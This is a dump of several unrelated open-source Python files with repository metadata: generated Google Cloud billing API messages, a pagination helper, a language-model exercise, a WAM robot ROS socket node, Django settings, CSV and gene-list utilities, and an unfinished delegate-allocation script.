allowed. If omitted, the report will include all labeled and unlabeled
usage.
Fields:
creditTypes: Optional. If Filter.credit_types_treatment is
INCLUDE_SPECIFIED_CREDITS, this is a list of credit types to be
subtracted from gross cost to determine the spend for threshold
calculations. If Filter.credit_types_treatment is **not**
INCLUDE_SPECIFIED_CREDITS, this field must be empty. See [a list of
acceptable credit type
values](https://cloud.google.com/billing/docs/how-to/export-data-
bigquery-tables#credits-type).
creditTypesTreatment: Optional. If not set, default behavior is
`INCLUDE_ALL_CREDITS`.
labels: Optional. A single label and value pair specifying that usage from
only this set of labeled resources should be included in the budget.
Currently, multiple entries or multiple values per entry are not
allowed. If omitted, the report will include all labeled and unlabeled
usage.
projects: Optional. A set of projects of the form `projects/{project}`,
specifying that usage from only this set of projects should be included
in the budget. If omitted, the report will include all usage for the
billing account, regardless of which project the usage occurred on. Only
zero or one project can be specified currently.
services: Optional. A set of services of the form `services/{service_id}`,
specifying that usage from only this set of services should be included
in the budget. If omitted, the report will include usage for all the
services. The service names are available through the Catalog API:
https://cloud.google.com/billing/v1/how-tos/catalog-api.
subaccounts: Optional. A set of subaccounts of the form
`billingAccounts/{account_id}`, specifying that usage from only this set
of subaccounts should be included in the budget. If a subaccount is set
to the name of the parent account, usage from the parent account will be
included. If omitted, the report will include usage from the parent
account and all subaccounts, if they exist.
"""
class CreditTypesTreatmentValueValuesEnum(_messages.Enum):
r"""Optional. If not set, default behavior is `INCLUDE_ALL_CREDITS`.
Values:
CREDIT_TYPES_TREATMENT_UNSPECIFIED: <no description>
INCLUDE_ALL_CREDITS: All types of credit are subtracted from the gross
cost to determine the spend for threshold calculations.
EXCLUDE_ALL_CREDITS: All types of credit are added to the net cost to
determine the spend for threshold calculations.
INCLUDE_SPECIFIED_CREDITS: Credit types specified in the credit_types
field are subtracted from the gross cost to determine the spend for
threshold calculations.
"""
CREDIT_TYPES_TREATMENT_UNSPECIFIED = 0
INCLUDE_ALL_CREDITS = 1
EXCLUDE_ALL_CREDITS = 2
INCLUDE_SPECIFIED_CREDITS = 3
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""Optional. A single label and value pair specifying that usage from
only this set of labeled resources should be included in the budget.
Currently, multiple entries or multiple values per entry are not allowed.
If omitted, the report will include all labeled and unlabeled usage.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2, repeated=True)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
creditTypes = _messages.StringField(1, repeated=True)
creditTypesTreatment = _messages.EnumField('CreditTypesTreatmentValueValuesEnum', 2)
labels = _messages.MessageField('LabelsValue', 3)
projects = _messages.StringField(4, repeated=True)
services = _messages.StringField(5, repeated=True)
subaccounts = _messages.StringField(6, repeated=True)
class GoogleCloudBillingBudgetsV1beta1LastPeriodAmount(_messages.Message):
r"""Describes a budget amount targeted to last period's spend. At this time,
the amount is automatically 100% of last period's spend; that is, there are
no other options yet. Future configuration will be described here (for
example, configuring a percentage of last period's spend).
"""
class GoogleCloudBillingBudgetsV1beta1ListBudgetsResponse(_messages.Message):
r"""Response for ListBudgets
Fields:
budgets: List of the budgets owned by the requested billing account.
nextPageToken: If not empty, indicates that there may be more budgets that
match the request; this value should be passed in a new
`ListBudgetsRequest`.
"""
budgets = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1Budget', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class GoogleCloudBillingBudgetsV1beta1ThresholdRule(_messages.Message):
r"""ThresholdRule contains a definition of a threshold which triggers an
alert (a notification of a threshold being crossed) to be sent when spend
goes above the specified amount. Alerts are automatically e-mailed to users
with the Billing Account Administrator role or the Billing Account User
role. The thresholds here have no effect on notifications sent to anything
configured under `Budget.all_updates_rule`.
Enums:
SpendBasisValueValuesEnum: Optional. The type of basis used to determine
if spend has passed the threshold. Behavior defaults to CURRENT_SPEND if
not set.
Fields:
spendBasis: Optional. The type of basis used to determine if spend has
passed the threshold. Behavior defaults to CURRENT_SPEND if not set.
thresholdPercent: Required. Send an alert when this threshold is exceeded.
This is a 1.0-based percentage, so 0.5 = 50%. Validation: non-negative
number.
"""
class SpendBasisValueValuesEnum(_messages.Enum):
r"""Optional. The type of basis used to determine if spend has passed the
threshold. Behavior defaults to CURRENT_SPEND if not set.
Values:
BASIS_UNSPECIFIED: Unspecified threshold basis.
CURRENT_SPEND: Use current spend as the basis for comparison against the
threshold.
FORECASTED_SPEND: Use forecasted spend for the period as the basis for
comparison against the threshold.
"""
BASIS_UNSPECIFIED = 0
CURRENT_SPEND = 1
FORECASTED_SPEND = 2
spendBasis = _messages.EnumField('SpendBasisValueValuesEnum', 1)
thresholdPercent = _messages.FloatField(2)
class GoogleCloudBillingBudgetsV1beta1UpdateBudgetRequest(_messages.Message):
r"""Request for UpdateBudget
Fields:
budget: Required. The updated budget object. The budget to update is
specified by the budget name in the budget.
updateMask: Optional. Indicates which fields in the provided budget to
update. Read-only fields (such as `name`) cannot be changed. If this is
not provided, then only fields with non-default values from the request
are updated. See https://developers.google.com/protocol-
buffers/docs/proto3#default for more details about default values.
"""
budget = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1Budget', 1)
updateMask = _messages.StringField(2)
class GoogleProtobufEmpty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo { rpc
Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON
representation for `Empty` is empty JSON object `{}`.
"""
class GoogleTypeMoney(_messages.Message):
r"""Represents an amount of money with its currency type.
Fields:
currencyCode: The three-letter currency code defined in ISO 4217.
nanos: Number of nano (10^-9) units of the amount. The value must be
between -999,999,999 and +999,999,999 inclusive. If `units` is positive,
`nanos` must be positive or zero. If `units` is zero, `nanos` can be
positive, zero, or negative. If `units` is negative, `nanos` must be
negative or zero. For example $-1.75 is represented as `units`=-1 and
`nanos`=-750,000,000.
units: The whole units of the amount. For example if `currencyCode` is
`"USD"`, then 1 unit is one US dollar.
"""
currencyCode = _messages.StringField(1)
nanos = _messages.IntegerField(2, variant=_messages.Variant.INT32)
units = _messages.IntegerField(3)
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default='json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| [
"saranraju90@gmail.com"
] | saranraju90@gmail.com |
4e3448bfeb4bf56e2ff41fc71a1727b619f401e6 | 526b6454565583700866463e46f66ede67165e2b | /expenses/pagination.py | d231586502537a64f68fbb878914834860e78b17 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | thangadurairajapandiyan/django-expenses | a0f04ac41d1b02be82642a084545a2b356fd5a59 | 4a463052a67ac080427857d3fec16cf78eb70c3b | refs/heads/master | 2023-03-30T04:24:01.096399 | 2021-03-31T20:30:17 | 2021-03-31T20:30:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,126 | py | # Pretty Pagination
# Copyright © 2018-2021, Chris Warrick.
# All rights reserved.
# License: 3-clause BSD
from itertools import zip_longest
def pagination(num, maxpage):
"""Generate a pretty pagination."""
if maxpage <= 5:
return list(range(1, maxpage + 1))
page_range = []
if num == 1:
around = {1, 2, 3}
elif num == maxpage:
around = {num - 2, num - 1, num}
else:
around = {num - 1, num, num + 1}
around |= {1, maxpage}
page_range_base = [i for i in sorted(around) if 0 < i <= maxpage]
for current_page, next_page in zip_longest(page_range_base, page_range_base[1:]):
page_range.append(current_page)
if next_page is None:
continue
diff = next_page - current_page
if diff == 2:
page_range.append(current_page + 1) # ellipsis should not be one page
elif diff > 2:
page_range.append("...")
return page_range
if __name__ == "__main__":
maxpage = 15
print("Pages:", maxpage)
for i in range(1, maxpage + 1):
print(i, pagination(i, maxpage), sep="\t")
| [
"kwpolska@gmail.com"
] | kwpolska@gmail.com |
72e5684f277e58025c9c50f2581ad6e89346988e | a9ec8521eff0d44683570115705139ed7cd00882 | /base_LM.py | e4ec39f617487113fa8d98dd6f7a85508a35d71e | [] | no_license | TheSuguser/problem | 1b8727f986857ecc89f13b19d19770fd6dfd2804 | 81cf6c1c87b971c7c33946afe77408e8eb18be39 | refs/heads/master | 2021-08-11T16:45:15.240045 | 2017-11-13T23:38:01 | 2017-11-13T23:38:01 | 108,463,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,999 | py | #! SETUP 1
import sys, os
_snlp_book_dir = "../../../../"
sys.path.append(_snlp_book_dir)
import statnlpbook.lm as lm
import statnlpbook.ohhla as ohhla
import math
import numpy as np
import matplotlib.pyplot as plt
#! SETUP 2
_snlp_train_dir = _snlp_book_dir + "/data/ohhla/train"
_snlp_dev_dir = _snlp_book_dir + "/data/ohhla/dev"
_snlp_train_song_words = ohhla.words(ohhla.load_all_songs(_snlp_train_dir))
_snlp_dev_song_words = ohhla.words(ohhla.load_all_songs(_snlp_dev_dir))
assert(len(_snlp_train_song_words)==1041496)
# Define Interpolated language model
class InterpolatedLM(lm.LanguageModel):
def __init__(self, main, backoff, alpha):
super().__init__(main.vocab, main.order)
self.main = main
self.backoff = backoff
self.alpha = alpha
def probability(self, word, *history):
return self.alpha * self.main.probability(word,*history) + \
(1.0 - self.alpha) * self.backoff.probability(word,*history)
# Deal with raw data
oov_train = lm.inject_OOVs(_snlp_train_song_words)
bigram = lm.NGramLM(oov_train, 2)
unigram = lm.NGramLM(oov_train,1)
trigram = lm.NGramLM(oov_train,3)
inter_lm = InterpolatedLM(bigram, unigram, 0.7171)
oov_vocab = set(oov_train)
#Create Language model
def create_lm(vocab):
"""
Return an instance of `lm.LanguageModel` defined over the given vocabulary.
Args:
vocab: the vocabulary the LM should be defined over. It is the union of the training and test words.
Returns:
a language model, instance of `lm.LanguageModel`.
"""
return lm.OOVAwareLM(inter_lm, vocab - oov_vocab)
#! SETUP 3
_snlp_test_dir = _snlp_book_dir + "/data/ohhla/dev"
#! SETUP 4
_snlp_test_song_words = ohhla.words(ohhla.load_all_songs(_snlp_test_dir))
_snlp_test_vocab = set(_snlp_test_song_words)
_snlp_dev_vocab = set(_snlp_dev_song_words)
_snlp_train_vocab = set(_snlp_train_song_words)
_snlp_vocab = _snlp_test_vocab | _snlp_train_vocab | _snlp_dev_vocab
_snlp_lm = create_lm(_snlp_vocab)
#! ASSESSMENT 1
_snlp_test_token_indices = [100, 1000, 10000]
_eps = 0.000001
for i in _snlp_test_token_indices:
result = sum([_snlp_lm.probability(word, *_snlp_test_song_words[i-_snlp_lm.order+1:i]) for word in _snlp_vocab])
print("Sum: {sum}, ~1: {approx_1}, <=1: {leq_1}".format(sum=result,
approx_1=abs(result - 1.0) < _eps,
leq_1=result - _eps <= 1.0))
#! ASSESSMENT 2
print("Perlexity:", lm.perplexity(_snlp_lm, _snlp_test_song_words))
# Test parameter
step = 100
alpha_range = np.linspace(0, 1, step)
perp = np.zeros(step)
for i in range(step):
print(i)
inter_lm = InterpolatedLM(bigram,unigram, alpha_range[i])
_snlp_lm = create_lm(_snlp_test_vocab)
perp[i] = lm.perplexity(_snlp_lm, _snlp_test_song_words)
min_indice = np.argmin(perp)
print(alpha_range[min_indice])
plt.figure()
plt.plot(alpha_range, perp)
plt.show()
| [
"joeyzhengzhe@gmail.com"
] | joeyzhengzhe@gmail.com |
2c05a5eb643ee36b8e1f9138cc739f830a29c969 | 38be6da813f2d230a90d1ac4c7deb81ca6221be0 | /search/binary_search/codeforces/F1324D/Solution.py | 55ba84a305dc917f87772d4b5b6ba75b95632875 | [
"MIT"
] | permissive | MdAman02/problem_solving | c8c0ce3cd5d6daa458cb0a54ac419c7518bdbe1f | 1cb731802a49bbb247b332f2d924d9440b9ec467 | refs/heads/dev | 2022-09-13T09:40:51.998372 | 2022-09-04T14:15:17 | 2022-09-04T14:15:17 | 256,194,798 | 0 | 0 | MIT | 2020-04-16T19:08:24 | 2020-04-16T11:27:57 | Java | UTF-8 | Python | false | false | 616 | py | # problem name: Pair of Topics
# problem link: https://codeforces.com/contest/1324/problem/D
# contest link: https://codeforces.com/contest/1324
# time: (?)
# author: reyad
# other_tags: sortings, two pointers, data structures
# note: this problem can be solved in various ways, so there are so many tags
from bisect import bisect_left
n = int(input())
a = [int(_) for _ in input().split()]
b = [int(_) for _ in input().split()]
u = sorted([i-j for i, j in zip(a, b)])
v = sorted([i-j for i, j in zip(b, a)])
a = 0
for x in u:
a += bisect_left(v, x) - (1 if x > 0 else 0)
print(a//2) | [
"reyadussalahin@gmail.com"
] | reyadussalahin@gmail.com |
387e7946b76b5cefb857f2e1d09d69c969770f03 | dee63018105424e25595f798b70b20a2085ab701 | /src/wam.py | 58239a6099b7e58b4b26598c239fc6516bdf6b29 | [] | no_license | tian-zhou/ttp | 166da7951a8e8cbf91ce60e28fd5f485347a988c | 61965f6e0d4bda347bc26314aedfcc84401d539f | refs/heads/master | 2020-03-11T09:20:42.224432 | 2018-05-27T19:04:14 | 2018-05-27T19:04:14 | 129,907,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,590 | py | #!/usr/bin/env python
"""
Description:
the program which governs communication with WAM robot
get real-time heartbeat from WAM to know its position
and send target joint position for WAM to go to
Sample usage:
wam = WAM()
wam.init_socket(host='128.46.125.212', port=4000, buflen=256)
wam.query_joint_position()
wam.move_joint([0, 0, 0, 0, 0, 0, 0])
wam.go_home()
Author:
Tian Zhou (leochou1991@gmail.com)
Date:
Nov 2, 2017
License:
GNU General Public License v3
"""
import sys
import rospy
from std_msgs.msg import String
from geometry_msgs.msg import Pose
from sensor_msgs.msg import JointState
import time
import socket
import numpy as np
def pprint(name, l):
l_str = ''.join(['%.3f ' % item for item in l])
print name + ': ' + l_str
class WAM:
def __init__(self):
# init node for wam_node
rospy.init_node('wam_node')
# everything about publishing robot joint state
self.joint_pub = rospy.Publisher('joint_states', JointState, queue_size=10)
self.joint_msg = JointState()
self.joint_msg.name = ['wam/base_yaw_joint', 'wam/shoulder_pitch_joint', \
'wam/shoulder_yaw_joint', 'wam/elbow_pitch_joint', 'wam/wrist_yaw_joint', \
'wam/wrist_pitch_joint', 'wam/palm_yaw_joint']
self.joint_msg_sep = 0
# everything about publishing robot cart state
self.cart_pub = rospy.Publisher('cart_states', Pose, queue_size=10)
self.cart_msg = Pose()
# init the subscriber now
rospy.Subscriber("wam_command", String, self.wam_command_msg_callback)
self.move_wam_msg = None
def clean_shutdown(self):
"""
Exits example cleanly by moving head to neutral position and
maintaining start state
"""
print("\nExiting moveWAM_BRIDGE()...")
if self.socket:
self.go_home()
self.socket.close()
print "Socket closed properly..."
def init_socket(self, host, port, buflen):
# init socket with Multimodal.exe in Windows C++
if host == 'local_file':
file = open("/home/tzhou/Workspace/catkin_ws/src/ttp/model/WAM_IP.txt", "r")
host = file.read()
print "recovered WAM IP %s from local file..." % host
# create a socket object
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.buflen = buflen
# connection to hostname on the port.
re_try = 1
while re_try and not rospy.is_shutdown():
try:
self.socket.connect((host, port))
re_try = 0
except:
print("Connection failed. Retry after 0.1 seconds")
re_try = 1
time.sleep(0.1)
continue
print "Built socket connection with WAM PC..."
print "Heartbeat started to get real-time robot joint positions..."
print "Wait for path planning result to move the robot..."
def query_joint_pose(self):
self.socket.send('2')
time.sleep(0.01)
pac = self.socket.recv(self.buflen)
return pac
def query_cart_pose(self):
self.socket.send('9')
time.sleep(0.01)
pac = self.socket.recv(self.buflen)
return pac
def go_home(self):
print "go home WAM you are drunk!!!"
self.socket.send('4')
time.sleep(1)
def wam_command_msg_callback(self, msg):
self.move_wam_msg = msg.data
def publish_joint_pose(self, pac):
pac = pac.split()[:7]
robot_pos = [float(s[:8]) for s in pac]
wam_joint = robot_pos[0:7]
self.joint_msg.position = wam_joint
self.joint_msg.header.seq = self.joint_msg_sep
self.joint_msg_sep += 1
current_time = time.time()
self.joint_msg.header.stamp.secs = int(current_time)
self.joint_msg.header.stamp.nsecs = int((current_time-int(current_time))*1e9)
self.joint_pub.publish(self.joint_msg)
def publish_cart_pose(self, pac):
pac = pac.split()[:8]
cart_pos = [float(s[:8]) for s in pac]
self.cart_msg.position.x = cart_pos[1]
self.cart_msg.position.y = cart_pos[2]
self.cart_msg.position.z = cart_pos[3]
self.cart_msg.orientation.w = cart_pos[4]
self.cart_msg.orientation.x = cart_pos[5]
self.cart_msg.orientation.y = cart_pos[6]
self.cart_msg.orientation.z = cart_pos[7]
self.cart_pub.publish(self.cart_msg)
def run(self):
rospy.on_shutdown(self.clean_shutdown)
while not rospy.is_shutdown():
pac = self.query_joint_pose()
self.publish_joint_pose(pac)
pac = self.query_cart_pose()
self.publish_cart_pose(pac)
# we have to do it here, otherwise the callback function
# mess up with the query joint/cart poses process
if self.move_wam_msg:
self.socket.send(self.move_wam_msg)
time.sleep(0.01)
pac = self.socket.recv(self.buflen)
assert (pac == 'complete')
rospy.signal_shutdown("run() finished...")
if __name__ == '__main__':
try:
wam = WAM()
wam.init_socket(host='local_file', port=4000, buflen=256)
wam.run()
except KeyboardInterrupt:
print("Ok ok, keyboard interrupt, quitting")
sys.exit(1)
else:
print("Normal termination")
sys.exit(2) | [
"leochou1991@gmail.com"
] | leochou1991@gmail.com |
a332729be8de4ce9a7e33437066ae82c80110be0 | bf7ad5c52e5be4fbf34816b95932d520e0f579d4 | /repeat.py | 0419ac8f22b5134ed7e2a5bb1e9e31d10d076841 | [] | no_license | veronicarose27/vero | 4722381a6598e3fc6f87596d52f6ca860219ad19 | c943344596dc4398accdd81bd9936ff114b8d738 | refs/heads/master | 2020-06-11T21:13:32.613495 | 2019-07-19T17:20:46 | 2019-07-19T17:20:46 | 194,087,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | y,z=map(int,input().split())
p=list(map(int,input().split()))
count=0
for i in range(0,len(p)):
for j in range(1,len(p)):
if(p[i]==p[j]):
count=count+1
if(count==z):
print(p[i])
break
| [
"noreply@github.com"
] | veronicarose27.noreply@github.com |
9b62a7f48fc31dd7431f348d7aa69ae41a386d94 | 6905b39a6d982c414a641861663c7da93b25351c | /app/app/settings.py | 68ccef7037fdb818a0146ce53807c6c20b8b05ab | [
"MIT"
] | permissive | dipee/recipe-app-api | 003668f7a476485616a77c885a26c399f24f31a3 | 1215da91f1336c204fabaafdfba74a3ebe7c7f9d | refs/heads/main | 2023-03-19T18:38:03.057332 | 2021-03-14T18:13:21 | 2021-03-14T18:13:21 | 343,751,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,317 | py | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p2^@r&8ynzu8&-#m!grt*7xnl@$r+*9q(v(1-3x=4(li_c7*f3'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'core',
'user',
'recipe',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
| [
"dipen.2052@gmail.com"
] | dipen.2052@gmail.com |
5cb177dcd14dbafc7f108ae4f38bcc1277cfc7ee | 0c3cb483095ab16018178cd8fec9c911e24597d5 | /main/app.py | a62ac1efe34bd5a86e91fb63e490a803945e7c2d | [] | no_license | AlexandreGuillermin/perso | d2ded3be9fb2b5f27b1fabe36a841d20796d2afb | b85a23987c36b35aa88d092f852268e5963a83ed | refs/heads/master | 2020-12-06T22:33:47.460101 | 2020-01-08T14:43:29 | 2020-01-08T14:43:29 | 232,569,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from main.repository.monitor import Monitor
def run():
server_ip_address = "3.89.135.227"
port = 22
username = "interfadm"
password = "Projet654!"
monitor = Monitor(server_ip_address, username, password)
monitor.connect_ssh()
| [
"noreply@github.com"
] | AlexandreGuillermin.noreply@github.com |
2e2ce31c358b69b0e6e61d4d8d53e58e55c87bf3 | 761975333f8353f0e23555c551b8eddc1b8bbe2b | /csvtools/csvsubsample.py | 4ec195c90c9ccca8464261aed1158fea43361307 | [
"MIT"
] | permissive | anbubenzigar/csvtools | e8763a0f9369f0101603b3988d5c2eede7c8cd7f | 6b6666369a70e367d8a9727472d2e72cfa658765 | refs/heads/master | 2023-04-10T21:21:47.302465 | 2021-04-20T23:47:29 | 2021-04-20T23:47:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | #!/usr/bin/env python
'''
subsample a tsv
'''
import argparse
import logging
import random
import sys
def main(probability):
logging.info('reading from stdin...')
first = True
total = written = 0
for line in sys.stdin:
if first:
sys.stdout.write(line)
first = False
else:
total += 1
if random.random() < probability:
sys.stdout.write(line)
written += 1
logging.info('done. wrote %i of %i records', written, total)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Subsample tsv')
parser.add_argument('--probability', required=False, type=float, default=1.0, help='tumour vcf')
parser.add_argument('--verbose', action='store_true', help='more logging')
args = parser.parse_args()
if args.verbose:
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.DEBUG)
else:
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
main(args.probability)
| [
"peter@supernifty.org"
] | peter@supernifty.org |
214b345dca75eb30cf6d1b15dca4381e00f58318 | d365ef1d86978270ac1df20efdba30c0c06d0a62 | /preprocessing/generate_two_hit.py | 8d69d7fa869412978202687459325c2043cf5488 | [] | no_license | lujonathanh/mutex | ac9c24316c1ae30de3467fce5f6869e0d37aa116 | 50dd444a3c6c0797667950fa1c5038faabc7ebc5 | refs/heads/master | 2020-12-15T21:32:34.822462 | 2016-06-20T20:41:34 | 2016-06-20T20:41:34 | 41,464,148 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,236 | py | __author__ = 'jlu96'
__author__ = 'jlu96'
"""Given a list of genes,
generate a list of genes and their copy-numbers."""
import sys
import csv
# read in the file
def get_parser():
# Parse arguments
import argparse
description = 'Given empirical gene mutation frequencies, generate a random mutation matrix out of the existing one.'
parser = argparse.ArgumentParser(description = description)
parser.add_argument('-i', '--input_file', required=True)
parser.add_argument('-o', '--output_file', required=True)
return parser
def run(args):
input = args.input_file
output = args.output_file
genes = set()
with open(input, 'rU') as genefile:
for row in genefile:
genes.add(row.rstrip())
print genes
gene_list = list(genes)
loss_gene_list = list([gene + 'loss' for gene in genes])
new_gene_list = gene_list + loss_gene_list
with open(output, 'w') as outfile:
writer = csv.writer(outfile, delimiter='\t')
for gene in new_gene_list:
writer.writerow([gene])
print "Two-hit gene list written to ", output
def main():
run(get_parser().parse_args(sys.argv[1:]))
if __name__ == '__main__':
main()
| [
"jhlu@princeton.edu"
] | jhlu@princeton.edu |
7cdd8e007bc22f51a231b7ec3f258d116447346c | aca4cf4bb1bdef2ab69db7b2ae1fe12c04af2bfc | /Users/delegatealloc.py | cd539a69eceafb361fae56de4730b8cec7e4ac9e | [] | no_license | PatrickMcGuinness/delegate-tools | 0154cdd3fc2eba042775c4117a5b3421396d2a7e | b8654ff324dff2aa2e24aaaedc2a365727930632 | refs/heads/master | 2021-07-03T01:13:20.162801 | 2016-03-22T21:56:52 | 2016-03-22T21:56:52 | 48,651,387 | 0 | 0 | null | 2021-06-10T18:05:36 | 2015-12-27T16:09:31 | Python | UTF-8 | Python | false | false | 5,757 | py | #!/usr/bin/python
import sys
import curses
from operator import itemgetter
from delegaterules import *
#from readpolldata import *
statemap = { 'AL': 'Alabama', 'AK': 'Alaska', 'AR': 'Arkansas', 'GA': 'Georgia',
'HI': 'Hawaii', 'ID': 'Idaho', 'KS': 'Kansas',
'KY': 'Kentucky', 'LA': 'Louisiana', 'ME': 'Maine', 'MA': 'Massachusetts',
'MI': 'Michigan', 'OK': 'Oklahoma', 'PR': 'PuertoRico',
'TN': 'Tennessee', 'TX': 'Texas', 'VT': 'Vermont', 'VA': 'Virginia',
'MN': 'Minnesota', 'WY':'Wyoming', 'MS': 'Mississippi', 'MO':'Missouri',
'AZ': 'Arizona', 'UT':'Utah'}
class Delegates():
def __init__(self):
return
# WTA rule: If a cand > WTA gets all delegates
# propthresh rule: If a candidate > propthresh, then proportionally to all candidates > thresh, shared by at least minthreshsplit
# minthreshsplit can be 1 (if only one candidate is above the threshold, they get all delegates), or 2 (texas rules)
# Fail to meet propthresh: If all candidates are < propthresh, then proportionally for all candidates
# We take out boundtotopvote dels from the at-large pool and assign it to
# top vote getter. (GA rules)
#CD rules: 3 dels - if top > WTA, 3 to top, if top > propthresh, 2 to top, 1 to next
# else 1 to the top 3 each
def delegate_alloc(self, rules, pollorder):
# print "in delegate_alloc"
propthresh = rules['propthresh']
total_dels = rules['numdelegates']
min_thresh_split = rules['minthreshsplit']
DelList = {}
# print pollorder, dels
cand = [0] * len(pollorder)
poll = [0] * len(pollorder)
for i in range(len(pollorder)):
(cand[i], poll[i]) = pollorder[i]
num_above_thresh = sum(x[1] > propthresh for x in pollorder)
if num_above_thresh > 0:
alloc_split = max(min_thresh_split, num_above_thresh)
else:
alloc_split = len(pollorder)
# polling_sum = sum(x for x in poll)
# print "num candidates:", len(pollorder), "num above threshold:",
# num_above_thresh, "sum of polling:", polling_sum
if poll[0] > rules['wta']:
DelList[cand[0]] = total_dels
return DelList
if total_dels == 3: # CD rules - hard-coded to a 2-1 split
if num_above_thresh > 0:
DelList[cand[0]] = 2 * total_dels / 3
DelList[cand[1]] = total_dels / 3
